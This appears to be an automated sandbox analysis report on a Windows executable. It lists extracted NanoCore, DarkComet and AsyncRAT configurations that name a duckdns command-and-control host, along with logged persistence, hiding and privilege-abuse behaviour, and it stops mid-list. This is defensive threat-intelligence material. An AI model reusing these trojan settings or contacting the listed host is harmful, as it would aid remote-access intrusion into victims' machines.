Analysis
-
max time kernel
15s -
max time network
60s -
platform
windows11-21h2_x64 -
resource
win11-20250410-en -
resource tags
arch:x64arch:x86image:win11-20250410-enlocale:en-usos:windows11-21h2-x64system -
submitted
21/04/2025, 19:20
General
-
Target
9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236.exe
-
Size
1018KB
-
MD5
eceb6e1e8aa84e6501589dc1d3deb419
-
SHA1
467a412530d7af26b01ec278d7d325e4b6dd047a
-
SHA256
9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236
-
SHA512
be256564941a092d73b6931dfa0a238b17d68c69e1742b98844e43fa3010db83bf9d52922912e127cd9b6cd1bbf9ecd39c4a36c2da676ca060bf21ffef8b27bf
-
SSDEEP
24576:pji1+TKiRzC0NqgGApfkxIpePcvkTR8cvkTAU:pu1+miRnQjALpe0vkTNvkTN
Malware Config
Extracted
nanocore
1.2.2.0
jvjv2044duck33.duckdns.org:54984
2fda0c27-65af-4514-b648-0066e7bbf615
-
activate_away_mode
true
-
backup_connection_host
jvjv2044duck33.duckdns.org
-
backup_dns_server
8.8.4.4
-
buffer_size
65535
-
build_time
2025-01-27T20:01:11.197098036Z
-
bypass_user_account_control
true
- bypass_user_account_control_data
-
clear_access_control
true
-
clear_zone_identifier
false
-
connect_delay
4000
-
connection_port
54984
-
default_group
Default
-
enable_debug_mode
true
-
gc_threshold
1.048576e+07
-
keep_alive_timeout
30000
-
keyboard_logging
false
-
lan_timeout
2500
-
max_packet_size
1.048576e+07
-
mutex
2fda0c27-65af-4514-b648-0066e7bbf615
-
mutex_timeout
5000
-
prevent_system_sleep
false
-
primary_connection_host
jvjv2044duck33.duckdns.org
-
primary_dns_server
8.8.8.8
-
request_elevation
true
-
restart_delay
5000
-
run_delay
0
-
run_on_startup
false
-
set_critical_process
true
-
timeout_interval
5000
-
use_custom_dns_server
false
-
version
1.2.2.0
-
wan_timeout
8000
Extracted
darkcomet
Guest16
jvjv2044duck33.duckdns.org:1604
DC_MUTEX-CK7UE3N
-
InstallPath
MSDCSC\msdcsc.exe
-
gencode
Jp74nsvbhc4i
-
install
true
-
offline_keylogger
true
-
persistence
true
-
reg_key
MicroUpdate
Extracted
asyncrat
0.5.8
Default
jvjv2044duck33.duckdns.org:8808
0fC8zJGwBBNm
-
delay
3
-
install
true
-
install_file
csrss.exe
-
install_folder
%AppData%
Signatures
-
Asyncrat family
-
Darkcomet family
-
Modifies WinLogon for persistence 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\UserInit = "C:\\Windows\\system32\\userinit.exe,C:\\Users\\Admin\\Documents\\MSDCSC\\msdcsc.exe" VLC1.EXE -
Nanocore family
-
Async RAT payload 1 IoCs
resource yara_rule behavioral2/files/0x001900000002b1a8-106.dat family_asyncrat -
Disables Task Manager via registry modification
-
Sets file to hidden 1 TTPs 5 IoCs
Modifies file attributes to stop it showing in Explorer etc.
pid Process 3440 attrib.exe 2164 attrib.exe 244 attrib.exe 4644 attrib.exe 1780 attrib.exe -
Executes dropped EXE 64 IoCs
pid Process 1608 FILE5.EXE 4212 JOKE.EXE 4288 LEGIT_SOFTWARE1.EXE 5296 LEGIT_SOFTWARE2.EXE 5672 JOKE2.EXE 4416 SENDE2R.EXE 4476 ULTIME MULTIHACK REBORN.EXE 2392 VLC1.EXE 5436 WINDOWS DEFENDER.EXE 2156 WINDOWS SECURITY NANO.EXE 4676 Rundll32.exe 1872 Rundll32.exe 5996 msdcsc.exe 6068 Rundll32.exe 2244 msdcsc.exe 1608 Rundll32.exe 1052 msdcsc.exe 2996 Rundll32.exe 708 Rundll32.exe 5448 Rundll32.exe 3636 Rundll32.exe 4568 Rundll32.exe 3108 Rundll32.exe 4188 Rundll32.exe 6044 Rundll32.exe 6104 Rundll32.exe 3360 Rundll32.exe 4396 Rundll32.exe 708 Rundll32.exe 4824 Rundll32.exe 3404 Rundll32.exe 5076 Rundll32.exe 2244 Rundll32.exe 1216 Rundll32.exe 3984 Rundll32.exe 3924 Rundll32.exe 4584 Rundll32.exe 5944 Rundll32.exe 1932 Rundll32.exe 3456 Rundll32.exe 2276 Rundll32.exe 4960 Rundll32.exe 3536 Rundll32.exe 2012 Rundll32.exe 5392 Rundll32.exe 4804 Rundll32.exe 4908 Rundll32.exe 3308 Rundll32.exe 2436 csrss.exe 1384 Rundll32.exe 4436 Rundll32.exe 32 Rundll32.exe 1984 Rundll32.exe 2000 Rundll32.exe 5104 Rundll32.exe 2748 Rundll32.exe 580 Rundll32.exe 1536 Rundll32.exe 5192 Rundll32.exe 3360 Rundll32.exe 2248 Rundll32.exe 4164 Rundll32.exe 3168 Rundll32.exe 5804 msdcsc.exe -
Adds Run key to start application 2 TTPs 5 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1492919288-2219487354-2015056034-1000\Software\Microsoft\Windows\CurrentVersion\Run\FindMe = "C:\\Windows\\Temp\\svchost_533423.exe" WScript.exe Set value (str) \REGISTRY\USER\S-1-5-21-1492919288-2219487354-2015056034-1000\Software\Microsoft\Windows\CurrentVersion\Run\FindMe = "C:\\Users\\Public\\Documents\\winservice_533423.exe" WScript.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\TCP Manager = "C:\\Program Files (x86)\\TCP Manager\\tcpmgr.exe" WINDOWS SECURITY NANO.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1492919288-2219487354-2015056034-1000\Software\Microsoft\Windows\CurrentVersion\Run\MicroUpdate = "C:\\Users\\Admin\\Documents\\MSDCSC\\msdcsc.exe" msdcsc.exe Set value (str) \REGISTRY\USER\S-1-5-21-1492919288-2219487354-2015056034-1000\Software\Microsoft\Windows\CurrentVersion\Run\MicroUpdate = "C:\\Users\\Admin\\Documents\\MSDCSC\\msdcsc.exe" VLC1.EXE -
Checks whether UAC is enabled 1 TTPs 1 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA WINDOWS SECURITY NANO.EXE -
Drops file in System32 directory 64 IoCs
description ioc Process File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe SENDE2R.EXE File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File opened for modification C:\Windows\SysWOW64\config\Rundll32.exe SENDE2R.EXE File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe File created C:\Windows\SysWOW64\config\Rundll32.exe Rundll32.exe -
resource yara_rule behavioral2/files/0x001900000002b199-102.dat upx behavioral2/memory/2392-110-0x0000000000400000-0x00000000004B7000-memory.dmp upx behavioral2/memory/5996-212-0x0000000000400000-0x00000000004B7000-memory.dmp upx behavioral2/memory/2244-266-0x0000000000400000-0x00000000004B7000-memory.dmp upx behavioral2/memory/2244-280-0x0000000000400000-0x00000000004B7000-memory.dmp upx behavioral2/memory/1052-282-0x0000000000400000-0x00000000004B7000-memory.dmp upx behavioral2/memory/1052-285-0x0000000000400000-0x00000000004B7000-memory.dmp upx behavioral2/memory/2392-295-0x0000000000400000-0x00000000004B7000-memory.dmp upx behavioral2/memory/5996-331-0x0000000000400000-0x00000000004B7000-memory.dmp upx behavioral2/memory/5804-468-0x0000000000400000-0x00000000004B7000-memory.dmp upx -
Drops file in Program Files directory 7 IoCs
description ioc Process File created C:\Program Files (x86)\WINDOWS DEFENDER.EXE FILE5.EXE File created C:\Program Files (x86)\WINDOWS SECURITY NANO.EXE FILE5.EXE File created C:\Program Files (x86)\TCP Manager\tcpmgr.exe WINDOWS SECURITY NANO.EXE File opened for modification C:\Program Files (x86)\TCP Manager\tcpmgr.exe WINDOWS SECURITY NANO.EXE File opened for modification C:\Program Files (x86)\VLC1.EXE attrib.exe File created C:\Program Files (x86)\ULTIME MULTIHACK REBORN.EXE FILE5.EXE File created C:\Program Files (x86)\VLC1.EXE FILE5.EXE -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
pid Process 6016 powershell.exe 4444 powershell.exe 2008 powershell.exe 1064 powershell.exe 2332 powershell.exe 4276 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cipher.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language attrib.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SENDE2R.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msdcsc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language LEGIT_SOFTWARE1.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msdcsc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rundll32.exe -
Delays execution with timeout.exe 10 IoCs
pid Process 5324 timeout.exe 5124 timeout.exe 5980 timeout.exe 4744 timeout.exe 4824 timeout.exe 4780 timeout.exe 6036 timeout.exe 1820 timeout.exe 3588 timeout.exe 3412 timeout.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1492919288-2219487354-2015056034-1000\Software\Microsoft\Internet Explorer\Main reg.exe -
Modifies registry class 3 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1492919288-2219487354-2015056034-1000_Classes\Local Settings 9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ VLC1.EXE Key created \REGISTRY\USER\S-1-5-21-1492919288-2219487354-2015056034-1000_Classes\Local Settings cmd.exe -
Modifies registry key 1 TTPs 1 IoCs
pid Process 4568 reg.exe -
Runs net.exe
-
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1364 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2156 WINDOWS SECURITY NANO.EXE 2156 WINDOWS SECURITY NANO.EXE 2156 WINDOWS SECURITY NANO.EXE 2156 WINDOWS SECURITY NANO.EXE 4476 ULTIME MULTIHACK REBORN.EXE 4476 ULTIME MULTIHACK REBORN.EXE 4444 powershell.exe 4444 powershell.exe 4476 ULTIME MULTIHACK REBORN.EXE 2008 powershell.exe 2008 powershell.exe 1064 powershell.exe 1064 powershell.exe 4476 ULTIME MULTIHACK REBORN.EXE 6016 powershell.exe 6016 powershell.exe 4476 ULTIME MULTIHACK REBORN.EXE 4476 ULTIME MULTIHACK REBORN.EXE 2156 WINDOWS SECURITY NANO.EXE 2156 WINDOWS SECURITY NANO.EXE 2156 WINDOWS SECURITY NANO.EXE 2156 WINDOWS SECURITY NANO.EXE 4476 ULTIME MULTIHACK REBORN.EXE 4476 ULTIME MULTIHACK REBORN.EXE 4276 powershell.exe 4276 powershell.exe 2332 powershell.exe 2332 powershell.exe 4476 ULTIME MULTIHACK REBORN.EXE 4476 ULTIME MULTIHACK REBORN.EXE 4476 ULTIME MULTIHACK REBORN.EXE 4476 ULTIME MULTIHACK REBORN.EXE 4476 ULTIME MULTIHACK REBORN.EXE 4476 ULTIME MULTIHACK REBORN.EXE 4476 ULTIME MULTIHACK REBORN.EXE 4476 ULTIME MULTIHACK REBORN.EXE 4444 powershell.exe 4476 ULTIME MULTIHACK REBORN.EXE 6016 powershell.exe 4476 ULTIME MULTIHACK REBORN.EXE 4476 ULTIME MULTIHACK REBORN.EXE 2008 powershell.exe 4476 ULTIME MULTIHACK REBORN.EXE 4476 ULTIME MULTIHACK REBORN.EXE 4476 ULTIME MULTIHACK REBORN.EXE 4476 ULTIME MULTIHACK REBORN.EXE 4476 ULTIME MULTIHACK REBORN.EXE 4476 ULTIME MULTIHACK REBORN.EXE 1064 powershell.exe 4276 powershell.exe 2332 powershell.exe 4476 ULTIME MULTIHACK REBORN.EXE 4476 ULTIME MULTIHACK REBORN.EXE 4476 ULTIME MULTIHACK REBORN.EXE 2156 WINDOWS SECURITY NANO.EXE 2156 WINDOWS SECURITY NANO.EXE 2156 WINDOWS SECURITY NANO.EXE 2156 WINDOWS SECURITY NANO.EXE 4476 ULTIME MULTIHACK REBORN.EXE 4476 ULTIME MULTIHACK REBORN.EXE 4476 ULTIME MULTIHACK REBORN.EXE 4476 ULTIME MULTIHACK REBORN.EXE 4476 ULTIME MULTIHACK REBORN.EXE 5436 WINDOWS DEFENDER.EXE -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 2156 WINDOWS SECURITY NANO.EXE -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeIncreaseQuotaPrivilege 2392 VLC1.EXE Token: SeSecurityPrivilege 2392 VLC1.EXE Token: SeTakeOwnershipPrivilege 2392 VLC1.EXE Token: SeLoadDriverPrivilege 2392 VLC1.EXE Token: SeSystemProfilePrivilege 2392 VLC1.EXE Token: SeSystemtimePrivilege 2392 VLC1.EXE Token: SeProfSingleProcessPrivilege 2392 VLC1.EXE Token: SeIncBasePriorityPrivilege 2392 VLC1.EXE Token: SeCreatePagefilePrivilege 2392 VLC1.EXE Token: SeBackupPrivilege 2392 VLC1.EXE Token: SeRestorePrivilege 2392 VLC1.EXE Token: SeShutdownPrivilege 2392 VLC1.EXE Token: SeDebugPrivilege 2392 VLC1.EXE Token: SeSystemEnvironmentPrivilege 2392 VLC1.EXE Token: SeChangeNotifyPrivilege 2392 VLC1.EXE Token: SeRemoteShutdownPrivilege 2392 VLC1.EXE Token: SeUndockPrivilege 2392 VLC1.EXE Token: SeManageVolumePrivilege 2392 VLC1.EXE Token: SeImpersonatePrivilege 2392 VLC1.EXE Token: SeCreateGlobalPrivilege 2392 VLC1.EXE Token: 33 2392 VLC1.EXE Token: 34 2392 VLC1.EXE Token: 35 2392 VLC1.EXE Token: 36 2392 VLC1.EXE Token: SeDebugPrivilege 2156 WINDOWS SECURITY NANO.EXE Token: SeDebugPrivilege 6016 powershell.exe Token: SeDebugPrivilege 4476 ULTIME MULTIHACK REBORN.EXE Token: SeDebugPrivilege 4444 powershell.exe Token: SeDebugPrivilege 2008 powershell.exe Token: SeIncreaseQuotaPrivilege 5996 msdcsc.exe Token: SeSecurityPrivilege 5996 msdcsc.exe Token: SeTakeOwnershipPrivilege 5996 msdcsc.exe Token: SeLoadDriverPrivilege 5996 msdcsc.exe Token: SeSystemProfilePrivilege 5996 msdcsc.exe Token: SeSystemtimePrivilege 5996 msdcsc.exe Token: SeProfSingleProcessPrivilege 5996 msdcsc.exe Token: SeIncBasePriorityPrivilege 5996 msdcsc.exe Token: SeCreatePagefilePrivilege 5996 msdcsc.exe Token: SeBackupPrivilege 5996 msdcsc.exe Token: SeRestorePrivilege 5996 msdcsc.exe Token: SeShutdownPrivilege 5996 msdcsc.exe Token: SeDebugPrivilege 5996 msdcsc.exe Token: SeSystemEnvironmentPrivilege 5996 msdcsc.exe Token: SeChangeNotifyPrivilege 5996 msdcsc.exe Token: SeRemoteShutdownPrivilege 5996 msdcsc.exe Token: SeUndockPrivilege 5996 msdcsc.exe Token: SeManageVolumePrivilege 5996 msdcsc.exe Token: SeImpersonatePrivilege 5996 msdcsc.exe Token: SeCreateGlobalPrivilege 5996 msdcsc.exe Token: 33 5996 msdcsc.exe Token: 34 5996 msdcsc.exe Token: 35 5996 msdcsc.exe Token: 36 5996 msdcsc.exe Token: SeDebugPrivilege 1064 powershell.exe Token: SeDebugPrivilege 2332 powershell.exe Token: SeDebugPrivilege 4276 powershell.exe Token: SeIncreaseQuotaPrivilege 4188 WMIC.exe Token: SeSecurityPrivilege 4188 WMIC.exe Token: SeTakeOwnershipPrivilege 4188 WMIC.exe Token: SeLoadDriverPrivilege 4188 WMIC.exe Token: SeSystemProfilePrivilege 4188 WMIC.exe Token: SeSystemtimePrivilege 4188 WMIC.exe Token: SeProfSingleProcessPrivilege 4188 WMIC.exe Token: SeIncBasePriorityPrivilege 4188 WMIC.exe -
Suspicious use of SetWindowsHookEx 3 IoCs
pid Process 4212 JOKE.EXE 5672 JOKE2.EXE 5996 msdcsc.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 5340 wrote to memory of 5924 5340 9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236.exe 78 PID 5340 wrote to memory of 5924 5340 9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236.exe 78 PID 5340 wrote to memory of 5924 5340 9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236.exe 78 PID 5340 wrote to memory of 1608 5340 9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236.exe 157 PID 5340 wrote to memory of 1608 5340 9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236.exe 157 PID 5340 wrote to memory of 1608 5340 9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236.exe 157 PID 5340 wrote to memory of 5388 5340 9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236.exe 80 PID 5340 wrote to memory of 5388 5340 9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236.exe 80 PID 5340 wrote to memory of 5388 5340 9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236.exe 80 PID 5340 wrote to memory of 2792 5340 9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236.exe 81 PID 5340 wrote to memory of 2792 5340 9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236.exe 81 PID 5340 wrote to memory of 2792 5340 9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236.exe 81 PID 5340 wrote to memory of 4212 5340 9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236.exe 82 PID 5340 wrote to memory of 4212 5340 9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236.exe 82 PID 5340 wrote to memory of 4212 5340 9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236.exe 82 PID 5340 wrote to memory of 5672 5340 9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236.exe 83 PID 5340 wrote to memory of 5672 5340 9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236.exe 83 PID 5340 wrote to memory of 5672 5340 9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236.exe 83 PID 5340 wrote to memory of 4288 5340 9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236.exe 84 PID 5340 wrote to memory of 4288 5340 9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236.exe 84 PID 5340 wrote to memory of 4288 5340 9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236.exe 84 PID 5340 wrote to memory of 5296 5340 9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236.exe 85 PID 5340 wrote to memory of 5296 5340 9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236.exe 85 PID 5340 wrote to memory of 5296 5340 9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236.exe 85 PID 5340 wrote to memory of 5076 5340 9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236.exe 193 PID 5340 wrote to memory of 5076 5340 9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236.exe 193 PID 5340 wrote to memory of 5076 5340 9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236.exe 193 PID 5340 wrote to memory of 4416 5340 9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236.exe 87 PID 5340 wrote to memory of 4416 5340 9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236.exe 87 PID 5340 wrote to memory of 4416 5340 9955e237e5f00ca94109005a2d778a88641d25fef299864223fa835e808f2236.exe 87 PID 1608 wrote to memory of 4476 1608 FILE5.EXE 88 PID 1608 wrote to memory of 4476 1608 FILE5.EXE 88 PID 